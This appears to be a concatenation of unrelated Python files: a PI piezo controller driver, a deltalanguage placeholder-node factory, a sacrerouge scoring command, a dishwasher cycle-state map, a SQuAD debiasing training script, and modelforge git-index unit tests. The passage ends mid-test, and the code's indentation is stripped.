while res: # Do we expect a response?
response = self.port.readline()
if not response.endswith(b'\n'):
raise TimeoutError(
"No response from PI Z-piezo. Did you expect a response?"
"Is the device plugged in? Is it on?"
" Is it at the serial port you expect?")
if self.verbose: print(" Response from Z-piezo:", response)
responses.append(response.rstrip().decode('ascii'))
# Non-final responses have a trailing space:
if len(response) == 1: break #...but length-1 responses don't
if response[-2] != 32: break
# Cleanup:
assert self.port.in_waiting == 0
self._check_errors()
return responses
def _check_errors(self):
self.port.write(b'ERR?\n')
self.err = self.port.readline()
if not self.err == b'0\n':
raise PIError("Z-piezo error code: ", int(self.err))
return None
def get_real_position(self):
if self.verbose: print("Getting Z-piezo real position...")
self.real_pos = float(self.send('POS?')[0].split('=')[1])
if self.verbose: print(" Real Z-piezo position:", self.real_pos)
return self.real_pos
def get_target_position(self):
if self.verbose: print("Getting Z-piezo target position...")
self.target_pos = float(self.send('MOV?')[0].split('=')[1])
if self.verbose: print(" Z-piezo target position:", self.target_pos)
return self.target_pos
def move(self, target):
"""Move the piezo to an absolute position of 'target' microns."""
assert self.pos_min <= target <= self.pos_max
self.target_pos = float(target)
if self.verbose: print('Moving Z-piezo to: %0.3f' % self.target_pos)
if self.closed_loop:
self.send('MOV 1 %0.9f'%self.target_pos, res=False)
else:
self.send('SVA 1 %0.9f'%self.target_pos, res=False)
return None
def _finish_moving(self):
## This probably doesn't need to be used because the piezo is quick
assert self.closed_loop
if self.verbose: print("Finishing Z-piezo motion...")
while True:
self.port.write(b'\x05')
if self.port.read(2) == b'0\n': break
if self.verbose: print(' Z-piezo motion complete.')
self._check_errors()
return None
def _set_offset_and_gain(self, offset=50, gain=0.5):
# We need special permission to write these parameters
self.send('CCL 1 advanced', res=False)
self.send('SPA 2 0x02000200 %0.9f'%float(offset), res=False)
self.send('SPA 2 0x02000300 %0.9f'%float(gain), res=False)
if self.verbose:
print('Setting Z-piezo analog offset to %s'%offset)
print('Setting Z-piezo analog gain to %s'%gain)
# Return permissions to default
self.send('CCL 0', res=False)
self.analog_offset, self.analog_gain = offset, gain
return None
def set_closed_loop(self, closed_loop=True):
if self.verbose: print('Setting closed loop to:', closed_loop)
if closed_loop:
self.send('SVO 1 1', res=False)
else:
self.send('SVO 1 0', res=False)
self.closed_loop = (self.send('SVO? 1')[0].split('=')[1] == '1')
assert self.closed_loop == closed_loop
if (abs(self.analog_offset - 50.0) > 1e-5 or
abs(self.analog_gain - 0.5) > 1e-5):
self._set_offset_and_gain()
return None
def set_analog_control_state(self, analog_control=True):
if hasattr(self, 'analog_control'):
if analog_control == self.analog_control: return None
if self.verbose: print('Setting Z-piezo analog input:', analog_control)
self.analog_control = analog_control
# Requires special permission for writing these parameters
self.send('CCL 1 advanced', res=False)
if self.analog_control and not self.closed_loop:
# Change the analog offset so that the current input voltage
# will 'target' the current position
target = float(self.send('SVA?')[0].split('=')[1])
voltage = float(self.send('TSP? 2')[0].split('=')[1])
self.analog_offset = self.analog_offset + (target - voltage)
self.send('SPA 2 0x02000200 %0.9f'%self.analog_offset, res=False)
if self.analog_control:
self.send('SPA 1 0x06000500 2', res=False)
else:
self.send('WGO 1 0', res=False) # Make sure the wave generator's off
self.send('SPA 1 0x06000500 0', res=False)
# Return permissions to default
self.send('CCL 0', res=False)
return None
def record_analog_movement(self, record_types=(2,), t_resolution=1):
"""Prepares tecord the piezo's response to an analog voltage.
Note that you must trigger the piezo controller recording via a
TTL high signal on pin 5 of the controller's IO socket, in
addition to providing an analog control signal to the analog-in
socket.
args:
record_types -- List of ints that correspond to the appropriate
codes of record types. Use 'HDR?' command to
retrieve a list of possible codes.
t_resolution -- int between 1 and 10000. Corresponds to the
frequency at which a measurement is recorded. Units
are processor cycles (40 microseconds/cycle).
returns:
None
"""
assert 0 < len(record_types) <= 8 # We only have 8 datatables
assert ''.join([str(i) for i in record_types]).isdigit()
self.record_types = record_types
if self.verbose: print('Preparing Z piezo to record movement...')
self.set_analog_control_state(False) # Disable for setup
self.send('RTR %d'%t_resolution, res=False) # Set time resolution
# Set the number of tables
self.send('CCL 1 advanced', res=False) # Mother, may I?
self.send('SPA 1 0x16000300 %d'%len(self.record_types), res=False)
self.send('CCL 0', res=False) # Return command level to 0
# Set the record type for each table
for which_table, record in enumerate(self.record_types):
if self.verbose:
print(' Setting z-piezo to record value type',
'%d on table %d' % (record, which_table+1))
self.send('DRC %d 1 %d' % (which_table+1, record), res=False)
# Set up wave generator, just to trigger data recording.
# This won't affect piezo movement because we'll be in analog mode.
self.send('WSL 1 1', res=False) # attach a random wave from wave table
self.send('WGO 1 2', res=False) # set up wave to run on TTL to I/O port
self.set_analog_control_state(True) # return to analog control
if self.verbose: print('Done. Z-piezo is ready to record movement')
return None
def retrieve_data_log(self, rows, record_types=None, starting_row=1):
"""By default this reads the whole record, which can be sloooow.
You can use the arguments to only read portions of the record.
"""
verbose, self.verbose = self.verbose, False # Clam up, this is spammy
if verbose:
print('Retrieving data log from Z-piezo...', end='')
if rows > 1000: print(' (be patient)', end='')
if record_types is None:
tables = range(1, len(self.record_types) + 1)
else:
tables = [self.record_types.index(r) + 1 for r in record_types]
assert 0 < rows * len(self.record_types) < 2**16
cmd_string = 'DRR? %d %d %s'%(
starting_row, rows, ' '.join([str(i) for i in tables]))
data_log = self.send(cmd_string)
# Parsing of data_table
data = []
for i in data_log:
if not i.startswith("#"):
data.append([float(m) for m in i.split('\t')])
else:
if 'SAMPLE_TIME' in i: ## grab the time interval
time_step = float(i.split()[3])
position_um = np.asarray(data) # Microns (for most but not all outputs!)
time_s = time_step * np.arange(position_um.shape[0]) # Seconds
self.verbose = verbose
if self.verbose: print(' done!')
return position_um, time_s
def _set_closed_loop_control_parameters(
self,
p_term=None,
i_term=None,
notch1_freq=None,
notch2_freq=None,
notch1_rej=None,
notch2_rej=None,
slew_rate=None
):
"""Sets parameters affecting closed-loop control.
Be careful with these settings, as some combinations can
cause piezo to oscillate uncontrollably. Don't mess with this
unless you know what you're doing."""
##TODO check inputs
self.send('CCL 1 advanced', res=False) # Simon says
if p_term != None:
self.send('SPA 1 0x07000300 %f' % p_term, res=False)
if i_term != None:
self.send('SPA 1 0x07000301 %f' % i_term, res=False)
if notch1_freq != None:
self.send('SPA 1 0x08000100 %f' % notch1_freq, res=False)
if notch2_freq != None:
self.send('SPA 1 0x08000101 %f' % notch2_freq, res=False)
if notch1_rej != None:
self.send('SPA 1 0x08000200 %f' % notch1_rej, res=False)
if notch2_rej != None:
self.send('SPA 1 0x08000201 %f' % notch2_rej, res=False)
if slew_rate != None:
self.send('SPA 1 0x07000200 %f' % slew_rate, res=False)
self.send('CCL 0', res=False)
return None
def stop(self):
try:
self.send('STP', res=False)
except PIError as e:
if e.error_code != 10: raise
return None
def close(self):
if self.verbose: print('Z-piezo is shutting down!')
# Leave the piezo in closed-loop, non-analog control
self.set_analog_control_state(False)
self.set_closed_loop()
self.move(50)
if self.closed_loop: self._finish_moving()
self.stop()
self.port.close()
return None
class PIError(Exception):
def __init__(self, value, error_code):
self.value = value
self.error_code = error_code
def __str__(self):
return str(self.value) + str(self.error_code)
if __name__ == '__main__':
##
## RemoteRefocus test code
##
z_piezo = E753_Z_Piezo(which_port = 'COM6', verbose=True)
## A few move tests
z_piezo.move(10)
z_piezo._finish_moving()
z_piezo.get_real_position()
z_piezo.move(50)
z_piezo._finish_moving()
z_piezo.close()
##
# z_piezo.record_analog_movement(record_types=[1, 2],
# t_resolution=10)
# z_piezo.retrieve_data_log(rows = 300,
# tables = [1, 2])
##
## Stage test code
##
## stage = C867_XY_Stage(which_port='COM5', verbose=True)
## # Clean-ish slate for testing:
## stage._reboot()
## # Check how fast we can execute round-trip motions:
## num_motions = 20
## motion_size_x = 1
## motion_size_y = 1
## print("Testing speed...")
##
## # Test conditions for speed test 1:
## stage.enable_joystick(False)
## stage._set_settling_time(0.100, 0.100)
## stage._set_precision(10, 10)
## stage.set_velocity(120, 120)
## stage.verbose = False
## stage.move(0, 0)
##
## start = time.perf_counter()
## for i in range(num_motions):
## stage.move(0, 0)
## stage.move(motion_size_x, motion_size_y)
## end = time.perf_counter()
## print(end - start, 'seconds')
## # These conditions should give high-ish speed:
## stage.enable_joystick(False)
## stage._set_settling_time(0.001, 0.001)
## stage._set_precision(10, 10)
## stage.set_velocity(120, 120)
## stage.verbose = False
## stage.move(0, 0)
## # Check how fast we can execute round-trip motions:
## print("Testing speed...")
## start = time.perf_counter()
## for i in range(num_motions):
## stage.move(0, 0)
## stage.move(motion_size_x, motion_size_y)
## end = time.perf_counter()
## print(end - start, 'seconds')
##
## stage.close()
|
500319
|
from ._delta_graph import DeltaGraph
from ._node_classes.placeholder_node import PlaceholderNode
from ._node_classes.real_nodes import as_node
def placeholder_node_factory(*args, name=None, **kwargs) -> PlaceholderNode:
"""Node factory for for :py:class:`PlaceholderNode`.
The main use case of such nodes is allowing us to create cycles
in :py:class:`DeltaGraph` by allowing data dependencies to be resolved
out of the order. The need for this step
Parameters
----------
args
Nodes to create in-ports for if needed.
name
Name for the placeholder.
kwargs
Nodes to create in-ports for by kw if needed.
Returns
-------
PlaceholderNode
Constructed placeholder node.
Examples
--------
In this example we see a simple cycle of 2 nodes.
The placeholder is first used to provide an input to a new node, and then
it is specified by :py:meth:`PlaceholderNode.specify_by_node`:
.. code-block:: python
>>> import deltalanguage as dl
>>> @dl.DeltaBlock()
... def foo(a: int) -> int:
... if a%2 == 0:
... return a
... else:
... return -a
>>> @dl.Interactive([("a", int)], [('output',int)])
... def bar(node):
... internal_memory = 0
...
... for i in range(5):
... node.send(i)
... internal_memory += node.receive("a")
...
... print("0 - 1 + 2 - 3 + 4 =", internal_memory)
... raise dl.DeltaRuntimeExit
>>> with dl.DeltaGraph() as graph:
... p = dl.placeholder_node_factory()
... b = bar.call(a=p)
... p.specify_by_node(foo(b))
>>> rt = dl.DeltaPySimulator(graph)
>>> rt.run()
0 - 1 + 2 - 3 + 4 = 2
.. warning::
It is very important to design graphs in such a way that the exit
condition
:py:class:`DeltaRuntimeExit<deltalanguage.runtime.DeltaRuntimeExit>`
can always be reached.
For graphs with cyclic dependency of nodes it means that at least
one node should contain an internal state that would terminate the
cycle and redirect the flow of data in the graph.
Formally it means that the graph of nodes (which might be cyclic) has
a representation as a graph of states (which must be acyclic).
In the example above the state of the graph changes at each cycle,
with a clear termination condition, i.e. when ``for`` loop terminates.
In case if nodes have non-determinism, the designer of the graph
might need to think about a backup exit plan, such as timeout or a
maximum number of iterations.
For instance, runtime simulators can be provided with the timeout
value, which will shut down the simulation regardless of the obtained
result, e.g. see
:py:meth:`DeltaPySimulator.run<deltalanguage.runtime.DeltaPySimulator.run>`.
Also users can define placeholders by a usual python functions
of class methods via :py:meth:`PlaceholderNode.specify_by_func` and
:py:meth:`PlaceholderNode.specify_by_method` respectively.
.. TODO:: Add examples for both cases.
"""
# Get an appropriate name
if name is None:
name = DeltaGraph.get_next_placeholder_name()
# Get the active graph from the top of the graph stack
graph = DeltaGraph.current_graph()
# Check if arguments are nodes.
# If not, put them in PyConstBodies in the current graph
pos_input_nodes = [as_node(arg, graph) for arg in args]
kw_input_nodes = {name: as_node(arg, graph)
for (name, arg) in kwargs.items()}
# Use PlaceholderNode constructor and return result
return PlaceholderNode(graph, name, *pos_input_nodes, **kw_input_nodes)
|
500367
|
import argparse
import logging
from collections import defaultdict
from overrides import overrides
from typing import Dict, List
from sacrerouge.commands import RootSubcommand
from sacrerouge.common import Params
from sacrerouge.common.logging import prepare_global_logging
from sacrerouge.common.util import import_module_and_submodules
from sacrerouge.data import EvalInstance, Metrics
from sacrerouge.data.dataset_readers import DatasetReader
from sacrerouge.io import JsonlWriter
from sacrerouge.metrics import Metric
logger = logging.getLogger(__name__)
def add_score_arguments(parser: argparse.ArgumentParser, include_config_arguments: bool) -> None:
if include_config_arguments:
parser.add_argument(
'--config',
type=str,
help='The config file that specifies the dataset reader and metrics',
required=True
)
parser.add_argument(
'--overrides',
type=str,
help='A serialized json that will override the parameters passed in "config"'
)
parser.add_argument(
'--output-jsonl',
type=str,
help='The path to where the input-level metrics should be written',
required=True
)
parser.add_argument(
'--log-file',
type=str,
help='The file where the log should be written'
)
parser.add_argument(
'--silent',
action='store_true',
help='Controls whether the log should be written to stdout'
)
parser.add_argument(
'--include-packages',
nargs='+',
help='A list of additional packages to include'
)
parser.add_argument(
'--disable-peer-jackknifing',
action='store_true',
help='Disable running jackknifing for peer summaries'
)
def _load_metrics(params: Params) -> List[Metric]:
metrics = []
for metric_params in params.pop('metrics'):
metric = Metric.from_params(metric_params)
metrics.append(metric)
return metrics
def _score_with_metric(metric: Metric,
instances: List[EvalInstance],
metrics_dicts: Dict[str, Dict[str, Metrics]],
disable_peer_jackknifing: bool = False) -> None:
# The summaries need to be grouped based on identical context. For instance, we group all of the summaries
# that have the same reference documents together. This can sometimes make calculating the metric faster. The
# following variables assist doing this.
#
# Maintains a list of the unique contexts which group the summaries
fields_list = []
# A mapping from the context to its index in `fields_list`
field_to_index = {}
# A nested list that will be parallel to `fields_list`. The entry at index `i` is a list of instances which should
# be scored with `fields_list[i]`
instances_list = []
# A nested list that will be parallel to `instances_list` which contains the summary-specific fields
# for the corresponding instance
summary_fields_lists = []
# A nested list that will be parallel to `instances_list` which marks if the calculation for that (summary, context)
# pair represents jackknifing or not
jackknifing_flags = []
for instance in instances:
# Select just the relevant fields for this metric
summary_fields = instance.fields.select_fields(metric.required_summary_fields)
context_fields = instance.fields.select_fields(metric.required_context_fields)
# Score the instance normally using all of the fields. However,
# if the metric requires jackknifing and this is a reference summary,
# the metric is comparable to the jackknifing metrics.
is_jackknifing = metric.requires_jackknifing() and instance.summarizer_type == 'reference'
if context_fields not in field_to_index:
field_to_index[context_fields] = len(field_to_index)
fields_list.append(context_fields)
instances_list.append([])
summary_fields_lists.append([])
jackknifing_flags.append([])
index = field_to_index[context_fields]
instances_list[index].append(instance)
summary_fields_lists[index].append(summary_fields)
jackknifing_flags[index].append(is_jackknifing)
# Potentially run jackknifing for the peers
if not disable_peer_jackknifing and metric.requires_jackknifing() and instance.summarizer_type == 'peer':
jk_fields_list = metric.jackknifer.get_jackknifing_fields_list(context_fields)
if jk_fields_list:
for jk_fields in jk_fields_list:
if jk_fields not in field_to_index:
field_to_index[jk_fields] = len(field_to_index)
fields_list.append(jk_fields)
instances_list.append([])
summary_fields_lists.append([])
jackknifing_flags.append([])
index = field_to_index[jk_fields]
instances_list[index].append(instance)
summary_fields_lists[index].append(summary_fields)
jackknifing_flags[index].append(True)
# Construct the arguments that will be passed to the scoring method
summary_args = []
for name in metric.required_summary_fields:
summary_args.append([[summary_fields[name].to_input() for summary_fields in summary_fields_list] for summary_fields_list in summary_fields_lists])
context_args = []
for name in metric.required_context_fields:
context_args.append([fields[name].to_input() for fields in fields_list])
# Score the summaries
results_lists = metric.score_multi_all(*summary_args, *context_args)
# Used to aggregate the jk results
jk_results = defaultdict(lambda: defaultdict(list))
for i, results_list in enumerate(results_lists):
for j, results in enumerate(results_list):
instance = instances_list[i][j]
is_jackknifing = jackknifing_flags[i][j]
if is_jackknifing:
jk_results[instance.instance_id][instance.summarizer_id].append(results)
else:
metrics_dicts[instance.instance_id][instance.summarizer_id].metrics.update(results)
# Aggregate the jk results
for instance_id in jk_results.keys():
for summarizer_id, results in jk_results[instance_id].items():
result = sum(results) / len(results)
for name, value in result.items():
metrics_dicts[instance_id][summarizer_id].metrics[name + '_jk'] = value
def _get_initial_metrics_dicts(instances: List[EvalInstance]) -> Dict[str, Dict[str, Metrics]]:
metrics_dicts = defaultdict(dict)
for instance in instances:
metrics = Metrics(instance.instance_id, instance.summarizer_id, instance.summarizer_type)
metrics_dicts[instance.instance_id][instance.summarizer_id] = metrics
return metrics_dicts
def score_instances(instances: List[EvalInstance],
metrics: List[Metric],
disable_peer_jackknifing: bool = False) -> Dict[str, Dict[str, Metrics]]:
metrics_dicts = _get_initial_metrics_dicts(instances)
for metric in metrics:
_score_with_metric(metric, instances, metrics_dicts, disable_peer_jackknifing=disable_peer_jackknifing)
return metrics_dicts
def save_score_results(metrics_dicts: Dict[str, Dict[str, Metrics]], output_file: str, silent: bool) -> None:
with JsonlWriter(output_file) as out:
for instance_id in sorted(metrics_dicts.keys()):
for summarizer_id in sorted(metrics_dicts[instance_id].keys()):
out.write(metrics_dicts[instance_id][summarizer_id])
@RootSubcommand.register('score')
class ScoreSubcommand(RootSubcommand):
@overrides
def add_subparser(self, parser: argparse._SubParsersAction):
description = 'Score all of the inputs to evaluate a metric'
self.parser = parser.add_parser('score', description=description, help=description)
add_score_arguments(self.parser, True)
self.parser.set_defaults(func=self.run)
@overrides
def run(self, args):
prepare_global_logging(file_path=args.log_file, silent=args.silent)
import_module_and_submodules('sacrerouge')
include_packages = args.include_packages or []
for package in include_packages:
import_module_and_submodules(package)
params = Params.from_file(args.config, args.overrides)
dataset_reader = DatasetReader.from_params(params.pop('dataset_reader'))
metrics = _load_metrics(params)
input_files = params.pop('input_files')
if isinstance(input_files, str):
input_files = [input_files]
instances = dataset_reader.read(*input_files)
metrics_dicts = score_instances(instances, metrics, args.disable_peer_jackknifing)
save_score_results(metrics_dicts, args.output_jsonl, args.silent)
|
500394
|
from .erd_cycle_state import ErdCycleState, ErdCycleStateRaw
CYCLE_STATE_RAW_MAP = {
ErdCycleStateRaw.PREWASH: ErdCycleState.PRE_WASH,
ErdCycleStateRaw.PREWASH1: ErdCycleState.PRE_WASH,
ErdCycleStateRaw.AUTO_HOT_START1: ErdCycleState.PRE_WASH,
ErdCycleStateRaw.AUTO_HOT_START2: ErdCycleState.PRE_WASH,
ErdCycleStateRaw.AUTO_HOT_START3: ErdCycleState.PRE_WASH,
ErdCycleStateRaw.END_PREWASH1: ErdCycleState.PRE_WASH,
ErdCycleStateRaw.SENSING: ErdCycleState.SENSING,
ErdCycleStateRaw.MAIN_WASH: ErdCycleState.MAIN_WASH,
ErdCycleStateRaw.DIVERTER_CAL: ErdCycleState.MAIN_WASH,
ErdCycleStateRaw.DRYING: ErdCycleState.DRYING,
ErdCycleStateRaw.SANITIZING: ErdCycleState.SANITIZING,
ErdCycleStateRaw.RINSING: ErdCycleState.RINSING,
ErdCycleStateRaw.TURNIDITY_CAL: ErdCycleState.RINSING,
ErdCycleStateRaw.FINAL_RINSE: ErdCycleState.RINSING,
ErdCycleStateRaw.FINAL_RINSE_FILL: ErdCycleState.RINSING,
ErdCycleStateRaw.PAUSE: ErdCycleState.PAUSE,
ErdCycleStateRaw.STATE_17: ErdCycleState.NA,
ErdCycleStateRaw.STATE_18: ErdCycleState.NA,
ErdCycleStateRaw.CYCLE_INACTIVE: ErdCycleState.NA,
ErdCycleStateRaw.MAX: ErdCycleState.NA,
ErdCycleStateRaw.INVALID: ErdCycleState.NA
}
|
500400
|
import argparse
import logging
# Need to import there for pickle
from debias.datasets.dataset_utils import QuantileBatcher
from debias.datasets.squad import AnnotatedSquadLoader
from debias.experiments.eval_debiased_squad import compute_all_scores
from debias.models.text_pair_qa_model import TextPairQaDebiasingModel
from debias.modules.attention_layers import WeightedDot, BiAttention
from debias.modules.cudnn_recurrent_dropout import CudnnLSTMRecurrentDropout
from debias.modules.layers import VariationalDropout, seq, FullyConnected, MaxPooler, Conv1d
from debias.modules.word_and_char_encoder import WordAndCharEncoder
from debias.training.evaluator import Evaluator
from debias.training.trainer import Trainer, AdamOptimizer
from debias.utils import py_utils, cli_utils
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--stratify", type=int, default=None)
parser.add_argument("--bias", choices=["tfidf", "tfidf_filtered"], default="tfidf_filtered")
cli_utils.add_general_args(parser)
cli_utils.add_loss_args(parser, default_penalty=2.0)
args = parser.parse_args()
if args.stratify is None:
if args.mode == "learned_mixin":
# Note sure if this actually makes a difference, but I turned this on
# for the learned_mixin case so we do here for exactness
args.stratify = 6
dbg = args.debug
if dbg:
epoch_size = 50
else:
epoch_size = 1341
opt = AdamOptimizer(max_grad_norm=5.0)
batcher = QuantileBatcher(45, 10, 300, 4, 12)
evaluator = Evaluator("squad")
trainer = Trainer(
batcher, opt, evaluator,
eval_batch_size=90,
num_epochs=30, epoch_size=epoch_size,
log_period=100,
prefetch=5, loss_ema=0.999,
n_processes=args.n_processes
)
filtered_bias = args.bias == "tfidf_filtered"
if dbg:
dataset = AnnotatedSquadLoader(
sample_train=1000, sample_dev=500, stratify=args.stratify, filtered_bias=filtered_bias)
else:
dataset = AnnotatedSquadLoader(
sample_train_eval=10000, stratify=args.stratify, filtered_bias=filtered_bias)
dim = 100
recurrent_layer = CudnnLSTMRecurrentDropout(dim, 0.0)
model = TextPairQaDebiasingModel(
None, # Assume pre-tokenized data
text_encoder=WordAndCharEncoder(
"glove.6B.50d" if dbg else "crawl-300d-2M",
first_n=None,
char_embed_dim=24,
character_mapper=Conv1d(100, 5, None),
character_pooler=MaxPooler(),
word_length=30
),
map_embed=seq(
VariationalDropout(0.2),
recurrent_layer,
VariationalDropout(0.2)
),
fuse_layer=BiAttention(WeightedDot()),
post_process_layer=seq(
FullyConnected(dim * 2, activation="glu"),
VariationalDropout(0.2),
recurrent_layer,
VariationalDropout(0.2),
recurrent_layer,
VariationalDropout(0.2),
),
debias_loss_fn=cli_utils.get_qa_loss_fn(args)
)
with open(__file__) as f:
notes = f.read()
py_utils.add_stdout_logger()
trainer.train(dataset, model, args.output_dir, notes)
if args.output_dir:
logging.info("Evaluating")
compute_all_scores(args.output_dir, ["dev", "add_sent", "add_one_sent"])
if __name__ == '__main__':
main()
|
500500
|
import os
import shutil
from tempfile import gettempdir
import unittest
import modelforge.index as index
from modelforge.tests import fake_dulwich as fake_git
class GitIndexTests(unittest.TestCase):
tempdir = gettempdir()
cached_path = os.path.join(tempdir, "modelforge-test-cache")
repo_path = os.path.join(cached_path, "src-d", "models")
default_url = "https://github.com/src-d/models"
templates_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "templates"))
default_index = {
"models": {
"docfreq": {
"12345678-9abc-def0-1234-56789abcdef0": {
"url": "https://xxx",
"created_at": "13:00",
"code": "model_code %s",
"description": "model_description"},
"1e3da42a-28b6-4b33-94a2-a5671f4102f4": {
"url": "https://xxx",
"created_at": "13:00",
"code": "%s",
"description": ""
}}},
"meta": {
"docfreq": {
"code": "readme_code %s",
"description": "readme_description",
"default": "12345678-9abc-def0-1234-56789abcdef0"}
}}
def clear(self):
if os.path.exists(self.cached_path):
shutil.rmtree(os.path.expanduser(self.cached_path))
def setUp(self):
index.git = fake_git
index.Repo = fake_git.FakeRepo
fake_git.FakeRepo.reset(self.default_index)
def tearDown(self):
self.clear()
from dulwich.repo import Repo
index.Repo = Repo
from dulwich import porcelain as git
index.git = git
def test_init_base(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
self.assertEqual(git_index.remote_url, "https://github.com/src-d/models")
self.assertEqual(git_index.repo, "src-d/models")
self.assertEqual(git_index.cached_repo, self.repo_path)
self.assertTrue(os.path.exists(os.path.join(
self.repo_path, "index.json")))
self.assertTrue(os.path.exists(os.path.join(
self.repo_path, "docfreq")))
self.assertListEqual(sorted(os.listdir(os.path.join(
self.repo_path, "docfreq"))),
["12345678-9abc-def0-1234-56789abcdef0.md",
"1e3da42a-28b6-4b33-94a2-a5671f4102f4.md"])
self.assertEqual(git_index.contents, self.default_index)
self.assertEqual(git_index.models, self.default_index["models"])
self.assertEqual(git_index.meta, self.default_index["meta"])
self.assertTrue(git_index.signoff)
def test_init_fetch(self):
index.GitIndex(remote=self.default_url, cache=self.cached_path)
self.assertTrue(fake_git.FakeRepo.checkout)
self.assertTrue(fake_git.FakeRepo.cloned)
fake_git.FakeRepo.reset(self.default_index)
index.GitIndex(remote=self.default_url, cache=self.cached_path)
self.assertFalse(fake_git.FakeRepo.cloned)
self.assertFalse(fake_git.FakeRepo.pulled)
fake_git.FakeRepo.reset(self.default_index, head="1")
index.GitIndex(remote=self.default_url, cache=self.cached_path)
self.assertFalse(fake_git.FakeRepo.cloned)
self.assertTrue(fake_git.FakeRepo.pulled)
def test_init_errors(self):
with self.assertRaises(ValueError):
index.GitIndex(remote="no_protocol", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="badprotocol://github.com", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http:///nodomain", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http://nopath.com", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http://github.com/not-git-repo", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http://github.com/bad-ssh", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http://github.com/bad-credentials", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote=self.default_url, username="no-password",
cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote=self.default_url, password="<PASSWORD>",
cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http://github.com/no-index", cache=self.cached_path)
with self.assertRaises(ValueError):
index.GitIndex(remote="http://github.com/json", cache=self.cached_path)
def test_init_variants(self):
git_index = index.GitIndex(
remote="http://github.com/src-d/models", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "http://github.com/src-d/models")
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote="git://github.com/src-d/models", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "git://github.com/src-d/models")
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote="ssh://[email protected]/src-d/models", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "ssh://[email protected]/src-d/models")
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote="git+ssh://[email protected]/src-d/models", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "git+ssh://[email protected]/src-d/models")
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote=self.default_url, username="user", password="password",
cache=self.cached_path)
self.assertEqual(git_index.remote_url, "https://user:[email protected]/src-d/models")
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote="https://notgithub.com/src-d/models", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "https://notgithub.com/src-d/models")
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote="https://github.com/not/src-d/models", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "https://github.com/not/src-d/models")
self.assertEqual(git_index.repo, "not/src-d/models")
self.assertEqual(git_index.cached_repo,
os.path.join(self.cached_path, "not", "src-d", "models"))
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(
remote="https://github.com/src-d.git/models.git", cache=self.cached_path)
self.assertEqual(git_index.remote_url, "https://github.com/src-d.git/models.git")
self.assertEqual(git_index.repo, "src-d.git/models")
self.assertEqual(git_index.cached_repo,
os.path.join(self.cached_path, "src-d.git/models"))
self.clear()
fake_git.FakeRepo.reset(self.default_index)
cached_path = os.path.join(self.cached_path, "cache")
git_index = index.GitIndex(remote="https://github.com/src-d/models", cache=cached_path)
self.assertEqual(git_index.repo, "src-d/models")
self.assertEqual(git_index.cached_repo,
os.path.join(self.cached_path, "cache", "src-d", "models"))
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path, signoff=True)
self.assertTrue(git_index.signoff)
def test_remove(self):
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
with self.assertRaises(ValueError):
git_index.remove_model("fake_uuid")
git_index.remove_model("1e3da42a-28b6-4b33-94a2-a5671f4102f4")
self.assertNotIn("1e3da42a-28b6-4b33-94a2-a5671f4102f4",
git_index.models["docfreq"])
self.assertIn("12345678-9abc-def0-1234-56789abcdef0", git_index.models["docfreq"])
self.assertEqual(git_index.meta["docfreq"]["default"],
"12345678-9abc-def0-1234-56789abcdef0")
self.assertFalse(os.path.exists(os.path.join(
self.repo_path, "docfreq", "1e3da42a-28b6-4b33-94a2-a5671f4102f4.md")))
self.assertTrue(os.path.exists(os.path.join(
self.repo_path, "docfreq", "12345678-9abc-def0-1234-56789abcdef0.md")))
git_index.remove_model("12345678-9abc-def0-1234-56789abcdef0")
self.assertNotIn("docfreq", git_index.models)
self.assertNotIn("docfreq", git_index.meta)
self.assertFalse(os.path.exists(os.path.join(
self.repo_path, "docfreq", "12345678-9abc-def0-1234-56789abcdef0")))
self.clear()
fake_git.FakeRepo.reset(self.default_index)
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
git_index.remove_model("12345678-9abc-def0-1234-56789abcdef0")
self.assertTrue(os.path.exists(os.path.join(
self.repo_path, "docfreq", "1e3da42a-28b6-4b33-94a2-a5671f4102f4.md")))
self.assertFalse(os.path.exists(os.path.join(
self.repo_path, "docfreq", "12345678-9abc-def0-1234-56789abcdef0.md")))
self.assertIn("1e3da42a-28b6-4b33-94a2-a5671f4102f4", git_index.models["docfreq"])
self.assertNotIn("12345678-9abc-def0-1234-56789abcdef0", git_index.models["docfreq"])
self.assertEqual(git_index.meta["docfreq"]["default"], "")
def test_add(self):
template_path = os.path.join(self.templates_dir, "model.md.jinja2")
git_index = index.GitIndex(remote=self.default_url, cache=self.cached_path)
template = git_index.load_template(template_path)
meta = {
"default": {"default": "92609e70-f79c-46b5-8419-55726e873cfc",
"code": "readme_code %s", "description": "readme_description"},
"model": {
"code": "model_code %s",
"description": "model_description",
"size": "4 Bytes",
"references": [["ref_name", "ref_url"]],
"extra": {"ext": "data"},
"license": "Proprietary",
"dependencies": [],
"url": "http://xxx",
"created_at": "13:42",
"version": [1, 0, 3]
}
}
